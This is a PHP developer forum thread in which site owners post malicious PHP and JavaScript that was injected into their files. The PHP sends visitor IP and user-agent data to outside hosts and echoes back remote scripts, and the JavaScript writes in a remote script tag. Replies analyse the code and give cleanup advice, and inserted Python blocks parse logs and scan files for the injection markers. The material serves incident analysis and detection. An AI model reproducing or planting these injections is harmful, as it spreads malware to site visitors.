PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.

All times are UTC - 5 hours




Post subject: Weird files on server
PostPosted: Thu Jan 09, 2014 5:33 pm 
Forum Contributor

Joined: Sat Sep 28, 2002 7:05 am
Posts: 243
Hi,
I discovered that on Dec 25th and on Jan 4th some files were changed on a server account. I found the following code added to the file that is used to log in to the admin side of an admin account:

<?php
#4f9ad5#
error_reporting(0); ini_set('display_errors',0); $wp_li1101 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_li1101) && !preg_match ('/bot/i', $wp_li1101))){
$wp_li091101="http://"."error"."css".".com/css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_li1101);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_li091101);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1101li = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1101li,1,3) === 'scr' ){ echo $wp_1101li; }
#/4f9ad5#
?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>


This code was also in a PHP file placed in a directory called 'template'. This was not placed there by myself, and the directory has the same creation date as one of the dates on which the other files were found to have been altered. The directory in which the 'template' directory was located does not have write permissions.

I also saw that several jQuery files were altered; they seemed to have all the '+' operators removed. This would just break the code; it just didn't seem to make any logical sense.

This account has no other access apart from myself, so it's not as if someone else could have done this without gaining access to the account. The password has been changed, but does anyone have any idea as to what might have been going on?

p.s. Needless to say the files have been replaced, removed and the password changed on the server.


PostPosted: Thu Jan 09, 2014 6:36 pm 
Spammer :|

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6379
Location: WA, USA
There was an exploit somewhere, but I think that goes without saying.

If you want to track down where, take a look at your server error logs (like auth logs) and your web server access logs (like to look for abnormal requests). If you're on a shared server then it's a bit harder and it could be that someone else on the server did it, but if you are then you should get your hosting provider to help you track down the problem - it's a problem for them too.

By the way, write permissions on a directory only matter when making changes to what is in the directory, such as creating new files. Files can be edited regardless (as long as you have write permissions on the file).


PostPosted: Fri Jan 10, 2014 2:20 pm 
Forum Contributor

Joined: Sat Sep 28, 2002 7:05 am
Posts: 243
Thanks for the reply.

I looked at the error log and found the following:

[Thu Jan 09 15:36:21 2014] [error] [client 188.143.234.6] File does not exist: /home/user/public_html/++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Erafkayatte";+\xe2\xee\xe7\xec\xee\xe6\xed\xee,+\xee\xf2\xef\xf0\xe0\xe2\xeb\xe5\xed\xee;, referer: http://domain.com/+++++++++++++++++++++ ... %E5%ED%EE;
[Thu Jan 09 11:25:22 2014] [error] [client 194.154.83.18] File does not exist: /home/user/public_html/user, referer: domain.com
[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+d.href+, referer: http://www.domain.com/js/+d.href+
[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+(, referer: http://www.domain.com/js/+%28/%5ehttps/ ... href%7c%7c


I am puzzled and curious; does anyone know what is actually being attempted here? I can't see much in the hacked files where PHP was added except what looks like a URL transfer.
Anyone any idea?


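A parser for the Apache error-log format posted above, added here as an example (it is not code from this thread). It keeps the "File does not exist" entries, groups them by client address and flags paths that look like probes or code fragments rather than pages. The sample lines are constructed in the same shape as the posted ones, with documentation-range addresses and a placeholder domain.

```python
import re
from collections import defaultdict

# Shape of the Apache error-log lines posted in this thread. The sample lines
# further down are constructed to match it (192.0.2.x addresses, placeholder domain).
LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] "
    r"File does not exist: (?P<path>.*?)(?:, referer: (?P<referer>.*))?$"
)
# Characters no legitimate path on a site like this would carry: code fragments
# ("+d.href+"), quoted strings, and the \x.. bytes the log uses for non-ASCII.
ODD = re.compile(r"""[+;()|<>"'`]|\\x[0-9a-f]{2}""")

def parse(lines):
    """Turn 'File does not exist' error-log lines into dicts; skip other lines."""
    return [m.groupdict() for m in map(LINE.match, lines) if m]

def probes_by_client(records):
    """Group 404s whose path looks like a probe rather than a page: {ip: [paths]}."""
    by_ip = defaultdict(set)
    for r in records:
        if ODD.search(r["path"]):
            by_ip[r["ip"]].add(r["path"])
    return {ip: sorted(paths) for ip, paths in by_ip.items()}

# Constructed sample log (same shape as the thread's entries, not the real ones).
SAMPLE_LOG = [
    r'[Thu Jan 09 15:36:21 2014] [error] [client 192.0.2.10] File does not exist: /home/user/public_html/+++Result:+\xe8\xf1+"Sample";, referer: http://domain.example/+++',
    r'[Thu Jan 09 11:25:22 2014] [error] [client 192.0.2.20] File does not exist: /home/user/public_html/user, referer: domain.example',
    r'[Thu Jan 09 03:20:56 2014] [error] [client 192.0.2.30] File does not exist: /home/user/public_html/js/+d.href+, referer: http://www.domain.example/js/+d.href+',
    r'[Thu Jan 09 03:20:56 2014] [error] [client 192.0.2.30] File does not exist: /home/user/public_html/js/+(, referer: http://www.domain.example/js/+%28',
    r'[Fri Jan 10 20:29:10 2014] [error] [client 192.0.2.40] File does not exist: /home/user/public_html/js',
    r'[Fri Jan 10 20:29:11 2014] [notice] caught SIGTERM, shutting down',
]
```

On a real server, feed it the error log with `probes_by_client(parse(open(path).read().splitlines()))`; the addresses it returns are the ones whose access-log entries for the same period are worth reading first.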
PostPosted: Fri Jan 10, 2014 2:26 pm 
Moderator

Joined: Tue Nov 09, 2010 3:39 pm
Posts: 6192
Location: Montreal, Canada
Looks like the error log is giving you a list of 404s from exploits he tried. I'd take a look at the access logs for the same time period as he eventually found one that worked.



PostPosted: Fri Jan 10, 2014 6:08 pm 
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
Looks like the logs are modified so it is hard to tell what the hacker is trying to access, but it looks like they are trying to find a script that can be encouraged to execute external code, or write to the local file system.

Are you running some commonly used tools or frameworks like WordPress or jQuery or other JavaScript/PHP or template packages? Since I can't tell what files he is trying to exploit from your logs, I would guess you have something installed that has a hole in it and needs patching.

Quote:
I can't see much in hacked files where PHP was added except what looks like a URL transfer.
It is possible the hacker is having trouble injecting code into your files, but is able to do some modifications. What do you mean by "URL transfer"?

I will say that http://errorcss.com is in Beijing, China, and this script is set up to ping it with host, IP and user agent information if a browser is not a "bot" and is Gecko or MSIE. If whatever data you send them meets some criteria they will then set if (substr($wp_1101li,1,3) === 'scr' ) so the user sees the response from errorcss.com. It is possible they are using your server to spread malware to vulnerable browsers.


PostPosted: Sat Jan 11, 2014 4:54 am 
Forum Contributor

Joined: Sat Sep 28, 2002 7:05 am
Posts: 243
Eric! wrote:
Looks like the logs are modified so it is hard to tell what the hacker is trying to access, but it looks like they are trying to find a script that can be encouraged to execute external code, or write to the local file system.

Are you running some commonly used tools or frameworks like WordPress or jQuery or other JavaScript/PHP or template packages? Since I can't tell what files he is trying to exploit from your logs, I would guess you have something installed that has a hole in it and needs patching.

Quote:
I can't see much in hacked files where PHP was added except what looks like a URL transfer.
It is possible the hacker is having trouble injecting code into your files, but is able to do some modifications. What do you mean by "URL transfer"?

I will say that http://errorcss.com is in Beijing, China, and this script is set up to ping it with host, IP and user agent information if a browser is not a "bot" and is Gecko or MSIE. If whatever data you send them meets some criteria they will then set if (substr($wp_1101li,1,3) === 'scr' ) so the user sees the response from errorcss.com. It is possible they are using your server to spread malware to vulnerable browsers.


Thanks for the reply.

The only thing I modified from the logs for posting is the domain and the user.

I am using jQuery on the server for a lightbox and wow; these files are the ones that the '+' operator was removed from.

I mentioned URL transfer only because the curl_setopt() function was in the php code placed in the file.

Thanks again.


PostPosted: Sun Jan 12, 2014 11:19 am 
Forum Contributor

Joined: Sat Sep 28, 2002 7:05 am
Posts: 243
BTW, on looking at the logs I see an error in the last couple of days where the person was looking for JS files on the server. I changed directory names after I found the problem, so it seems someone was looking for the old js directory.

[Fri Jan 10 20:29:10 2014] [error] [client 180.76.6.16] File does not exist: /home/user/public_html/js

Thanks again for everyone who replied on this post.


PostPosted: Mon Jan 13, 2014 4:50 pm 
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
If you haven't upgraded all those libraries, you probably should, as well as go through the release notes to see if you can find a security fix that matches the version and problem you witnessed. If you have the most recent libraries/files, then there might be a security flaw and it's just a matter of time before they re-index your domain and find the file again. In fact, since you moved it and saw an error, they might have already re-indexed your files.


PostPosted: Tue Jan 14, 2014 10:27 pm 
Moderator

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5975
Location: Odessa, Ukraine
requinix wrote:
There was an exploit somewhere, but I think that goes without saying.

There's one more place which might get exploited requinix forgot to mention: the computer you use to access the server. Malware is known to gather FTP passwords, and I'd imagine it's not that hard to intercept web-based access credentials either, once your computer is infected.


PostPosted: Thu Jan 16, 2014 6:46 pm 
Forum Newbie

Joined: Thu Jan 16, 2014 6:40 pm
Posts: 1
I also had the same attack.
On January 5 they injected this code into some .php files (index, header, footer, etc.):

<?php
#a3e35a#
error_reporting(0); ini_set('display_errors',0); $wp_vqcs1 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vqcs1) && !preg_match ('/bot/i', $wp_vqcs1))){
$wp_vqcs091="http://"."html"."-style".".com/style"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vqcs1);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_vqcs091);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1vqcs = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1vqcs,1,3) === 'scr' ){ echo $wp_1vqcs; }
#/a3e35a#
?>

On January 15 they injected this code into all .js files on my server:

/*38c393*/
document.write("<script src='http://www.ceprede.es/y2W8Ljrc.php?id=122690528' type='text/javascript'></" + "script>");
/*/38c393*/

The problem is that I have many sites on a single shared server, so I cannot go back to where the attack started.

I think on some WP installation, but I don't know exactly.

:(


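A file scanner, added here as an example (not code from this thread), that recognises both injection shapes quoted in it: the PHP block between "#xxxxxx#" markers from the first post and the JS block between "/*xxxxxx*/" markers from the post above. It also counts the empty <?php ?> pairs that followed the first poster's block. The marker values, host names and variable names in the embedded samples are constructed placeholders, not the real ones.

```python
import re

# Marker pairs used by the injections quoted in this thread: PHP wrapped in
# "#xxxxxx# ... #/xxxxxx#", JS wrapped in "/*xxxxxx*/ ... /*/xxxxxx*/".
PHP_BLOCK = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.S)
JS_BLOCK = re.compile(r"/\*([0-9a-f]{6})\*/(.*?)/\*/\1\*/", re.S)
EMPTY_PHP = re.compile(r"<\?php\s*\?>")  # the empty tag pairs appended after the block

# Traits of the block bodies: UA sniff for Gecko/MSIE, curl call-home, echoing a
# reply whose 2nd..4th chars are "scr" (i.e. "<script"), or a remote script tag.
PHP_TRAITS = [
    r"\$_SERVER\['HTTP_USER_AGENT'\]",
    r"preg_match\s*\(\s*'/Gecko\|MSIE/i'",
    r"curl_init\s*\(",
    r"substr\s*\([^)]*,\s*1\s*,\s*3\s*\)\s*===\s*'scr'",
]
JS_TRAITS = [r"document\.write\s*\(", r"<script\s+src="]

def scan_text(text):
    """Return (kind, marker, matched_trait_count) for each marked block in text."""
    hits = []
    for kind, rx, traits in (("php", PHP_BLOCK, PHP_TRAITS), ("js", JS_BLOCK, JS_TRAITS)):
        for m in rx.finditer(text):
            score = sum(1 for t in traits if re.search(t, m.group(2)))
            hits.append((kind, m.group(1), score))
    return hits

def scan_file(path):
    """Scan one .php/.js file: (block hits, number of empty <?php ?> pairs)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return scan_text(text), len(EMPTY_PHP.findall(text))

# Constructed samples shaped like the thread's injections (placeholder hosts/markers).
SAMPLE_PHP = """<?php
#a1b2c3#
error_reporting(0); ini_set('display_errors',0); $ua = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $ua) && !preg_match ('/bot/i', $ua))){
$u="http://"."host".".invalid/?ip=".$_SERVER['REMOTE_ADDR']."&ua=".urlencode($ua);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$u); $r = curl_exec ($ch); curl_close($ch);}
if ( substr($r,1,3) === 'scr' ){ echo $r; }
#/a1b2c3#
?>
<?php

?>
"""
SAMPLE_JS = """/*9f8e7d*/
document.write("<script src='http://host.invalid/x.php?id=1'></" + "script>");
/*/9f8e7d*/
"""
```

Run `scan_file` over every .php and .js file under the web root; a block with a full trait score is the injection itself, while a marked block with a low score or a file with only empty tag pairs still deserves a look, since the markers change between variants.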
PostPosted: Thu Jan 16, 2014 7:41 pm 
Spammer :|

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6379
Location: WA, USA
apelissetti wrote:
i think on some wp installation

Yeah, WordPress is known for that... feature.

